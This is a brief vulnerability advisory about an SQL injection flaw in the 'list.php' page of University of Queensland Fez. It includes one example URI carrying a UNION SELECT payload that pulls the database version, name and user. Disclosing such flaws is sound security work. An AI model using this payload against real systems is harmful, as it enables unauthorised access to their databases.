University of Queensland Fez 'list.php' SQL Injection Vulnerability

University of Queensland Fez 'list.php' SQL Injection Vulnerability

Attackers can exploit this issue via a browser.

The following example URI is available:

http://www.example.com/list.php?browse=subject&parent_id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/*